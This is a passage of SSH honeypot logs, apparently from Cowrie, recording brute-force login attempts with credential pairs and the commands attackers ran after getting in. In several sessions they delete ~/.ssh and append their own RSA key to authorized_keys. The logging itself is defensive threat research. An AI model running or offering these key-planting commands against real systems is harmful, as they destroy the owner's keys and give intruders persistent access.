{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:42:08.699414Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:42:08.726246Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:08.727111Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40642,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e728b31feac","protocol":"ssh","message":"New connection: 212.227.235.229:40642 (1.2.3.4:22) [session: 8e728b31feac]","sensor":"my-vps","timestamp":"2025-09-08T12:42:09.196877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:09.197568Z","src_ip":"212.227.235.229","session":"8e728b31feac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:09.467989Z","src_ip":"212.227.235.229","session":"8e728b31feac"}
{"eventid":"cowrie.session.connect","src_ip":"184.174.35.208","src_port":46710,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cd2b9f12bd0","protocol":"ssh","message":"New connection: 184.174.35.208:46710 (1.2.3.4:22) [session: 3cd2b9f12bd0]","sensor":"my-vps","timestamp":"2025-09-08T12:42:09.753474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:09.754394Z","src_ip":"184.174.35.208","session":"3cd2b9f12bd0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:09.770751Z","src_ip":"184.174.35.208","session":"3cd2b9f12bd0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:42:09.875974Z","src_ip":"184.174.35.208","session":"3cd2b9f12bd0"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T12:42:10.591454Z","src_ip":"212.227.235.229","session":"8e728b31feac"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:10.895309Z","src_ip":"184.174.35.208","session":"3cd2b9f12bd0"}
{"eventid":"cowrie.session.connect","src_ip":"184.174.35.208","src_port":46712,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dcaee04c832","protocol":"ssh","message":"New connection: 184.174.35.208:46712 (1.2.3.4:22) [session: 3dcaee04c832]","sensor":"my-vps","timestamp":"2025-09-08T12:42:10.926708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:10.927882Z","src_ip":"184.174.35.208","session":"3dcaee04c832"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:10.952266Z","src_ip":"184.174.35.208","session":"3dcaee04c832"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:42:11.091259Z","src_ip":"184.174.35.208","session":"3dcaee04c832"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:11.117085Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:11.118591Z","src_ip":"184.174.35.208","session":"3dcaee04c832"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:11.864196Z","src_ip":"212.227.235.229","session":"8e728b31feac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37756,"dst_ip":"1.2.3.4","dst_port":22,"session":"29d2e1e0bc87","protocol":"ssh","message":"New connection: 212.227.235.229:37756 (1.2.3.4:22) [session: 29d2e1e0bc87]","sensor":"my-vps","timestamp":"2025-09-08T12:42:22.663006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:22.664487Z","src_ip":"212.227.235.229","session":"29d2e1e0bc87"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:22.828806Z","src_ip":"212.227.235.229","session":"29d2e1e0bc87"}
{"eventid":"cowrie.login.failed","username":"manish","password":"manish","message":"login attempt [manish/manish] failed","sensor":"my-vps","timestamp":"2025-09-08T12:42:23.531989Z","src_ip":"212.227.235.229","session":"29d2e1e0bc87"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:24.707282Z","src_ip":"212.227.235.229","session":"29d2e1e0bc87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39638,"dst_ip":"1.2.3.4","dst_port":22,"session":"516820c92326","protocol":"ssh","message":"New connection: 212.227.235.229:39638 (1.2.3.4:22) [session: 516820c92326]","sensor":"my-vps","timestamp":"2025-09-08T12:42:41.674556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:41.677705Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:41.973329Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.login.success","username":"root","password":"p0o9i8u7","message":"login attempt [root/p0o9i8u7] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:42:43.160155Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:42:43.805621Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:42:43.806319Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:42:43.807579Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:44.107020Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:42:44.717757Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:42:44.718421Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:42:45.020044Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:45.021162Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41018,"dst_ip":"1.2.3.4","dst_port":22,"session":"be2ada149d35","protocol":"ssh","message":"New connection: 212.227.235.229:41018 (1.2.3.4:22) [session: be2ada149d35]","sensor":"my-vps","timestamp":"2025-09-08T12:42:45.303969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:45.307376Z","src_ip":"212.227.235.229","session":"be2ada149d35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:45.597173Z","src_ip":"212.227.235.229","session":"be2ada149d35"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:42:46.763706Z","src_ip":"212.227.235.229","session":"be2ada149d35"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:48.058566Z","src_ip":"212.227.235.229","session":"be2ada149d35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42266,"dst_ip":"1.2.3.4","dst_port":22,"session":"a69bb90546cf","protocol":"ssh","message":"New connection: 212.227.235.229:42266 (1.2.3.4:22) [session: a69bb90546cf]","sensor":"my-vps","timestamp":"2025-09-08T12:42:48.361561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:48.362392Z","src_ip":"212.227.235.229","session":"a69bb90546cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:48.661283Z","src_ip":"212.227.235.229","session":"a69bb90546cf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:42:49.899194Z","src_ip":"212.227.235.229","session":"a69bb90546cf"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:50.199454Z","src_ip":"212.227.235.229","session":"516820c92326"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:50.200582Z","src_ip":"212.227.235.229","session":"a69bb90546cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58384,"dst_ip":"1.2.3.4","dst_port":22,"session":"48967a525c3e","protocol":"ssh","message":"New connection: 212.227.235.229:58384 (1.2.3.4:22) [session: 48967a525c3e]","sensor":"my-vps","timestamp":"2025-09-08T12:42:54.640049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:54.640921Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh 